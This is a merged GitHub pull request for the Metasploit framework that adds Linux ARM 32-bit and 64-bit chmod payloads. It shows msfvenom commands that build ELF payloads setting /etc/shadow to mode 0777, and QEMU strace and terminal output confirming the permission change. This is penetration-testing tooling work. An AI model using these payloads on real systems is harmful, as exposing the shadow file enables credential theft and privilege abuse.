Skip to content

Add Linux ARM chmod payloads #20845

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
dledda-r7 merged 1 commit into from
Jan 14, 2026
Merged

Add Linux ARM chmod payloads #20845

dledda-r7 merged 1 commit into from
Jan 14, 2026
+163 −1

Conversation

@bcoles
Copy link
Contributor

@bcoles bcoles commented Jan 5, 2026

Add Linux ARM 32-bit / 64-bit Little Endian chmod payloads.

Tested with QEMU.

Verification

ARM Little Endian (armle) (32-bit)

Generate a Linux Chmod payload (with optional NOP sled):

./msfvenom -n 100 --format elf -p linux/armle/chmod FILE="/etc/shadow" MODE="0777" > chmod.elf

Execute the payload with QEMU:

$ /home/user/qemu/build/qemu-arm -strace ./chmod.elf ; ls -la /etc/shadow
1132678 chmod("/etc/shadow",0777) = -1 errno=1 (Operation not permitted)
1132678 exit(0)
-rw-r----- 1 root shadow 1874 Jan 24  2025 /etc/shadow
$ sudo /home/user/qemu/build/qemu-arm -strace ./chmod.elf ; ls -la /etc/shadow
1132685 chmod("/etc/shadow",0777) = 0
1132685 exit(0)
-rwxrwxrwx 1 root shadow 1874 Jan 24  2025 /etc/shadow

Note the payload was executed successfully and the file permissions were changed.

ARM (aarch64) (64-bit)

Generate a Linux Chmod payload (with optional NOP sled):

./msfvenom -n 100 --format elf -p linux/aarch64/chmod FILE="/etc/shadow" MODE="0777" > chmod.elf

Execute the payload with QEMU:

$ /home/user/qemu/build/qemu-aarch64 -strace ./chmod.elf ; ls -la /etc/shadow
1132844 fchmodat(AT_FDCWD,"/etc/shadow",0777,0) = -1 errno=1 (Operation not permitted)
1132844 exit(0)
-rw-r----- 1 root shadow 1874 Jan 24  2025 /etc/shadow
$ sudo /home/user/qemu/build/qemu-aarch64 -strace ./chmod.elf ; ls -la /etc/shadow
1132849 fchmodat(AT_FDCWD,"/etc/shadow",0777,0) = 0
1132849 exit(0)
-rwxrwxrwx 1 root shadow 1874 Jan 24  2025 /etc/shadow

Note the payload was executed successfully and the file permissions were changed.

@dledda-r7
Copy link
Contributor

dledda-r7 commented Jan 13, 2026

Hi @bcoles , would you mind passing msftidy on the module? thank!

@bcoles bcoles force-pushed the linux-arm-chmod-payloads branch from f44151a to e245298 Compare January 13, 2026 14:04
@bcoles
Copy link
Contributor Author

bcoles commented Jan 13, 2026

Hi @bcoles , would you mind passing msftidy on the module? thank!

done

dledda-r7
dledda-r7 approved these changes Jan 14, 2026
View reviewed changes
Copy link
Contributor

@dledda-r7 dledda-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more. 

┌──(kali㉿kali)-[~/Public]
└─$ cat notread       
cat: notread: Permission denied
                                                                                                            
┌──(kali㉿kali)-[~/Public]
└─$ qemu-armel -strace chmod.armle.elf 
126530 chmod("/home/kali/Public/notread",0777) = 0
126530 exit(0)
                                                                                                            
┌──(kali㉿kali)-[~/Public]
└─$ cat notread 
oh no D:
                                                                                                            
┌──(kali㉿kali)-[~/Public]
└─$ 

┌──(kali㉿kali)-[~/Public]
└─$ cat notread 
cat: notread: Permission denied
                                                                                                            
┌──(kali㉿kali)-[~/Public]
└─$ chmod +x chmod.aarch64.elf 
                                                                                                            
┌──(kali㉿kali)-[~/Public]
└─$ qemu-aarch64 -strace chmod.aarch64.elf 
127162 fchmodat(AT_FDCWD,"/home/kali/Public/notread",0777,0) = 0
127162 exit(0)
                                                                                                            
┌──(kali㉿kali)-[~/Public]
└─$ cat notread               
oh no D:
                                                                                                            
┌──(kali㉿kali)-[~/Public]
└─$

@github-project-automation github-project-automation bot moved this from Todo to In Progress in Metasploit Kanban Jan 14, 2026
@dledda-r7 dledda-r7 merged commit e96c1e9 into rapid7:master Jan 14, 2026
44 of 48 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Jan 14, 2026
@bcoles bcoles deleted the linux-arm-chmod-payloads branch January 14, 2026 13:36
@sjanusz-r7 sjanusz-r7 added the rn-payload-enhancement release notes for enhanced payloads label Jan 15, 2026
@sjanusz-r7
Copy link
Contributor

sjanusz-r7 commented Jan 15, 2026

Release Notes

Adds Linux ARM 32-bit / 64-bit Little Endian chmod payloads.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@dledda-r7 dledda-r7 dledda-r7 approved these changes

Assignees

@dledda-r7 dledda-r7

Labels

arm arm payload rn-payload-enhancement release notes for enhanced payloads

Projects

Metasploit Kanban
Status: Done

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@bcoles @dledda-r7 @sjanusz-r7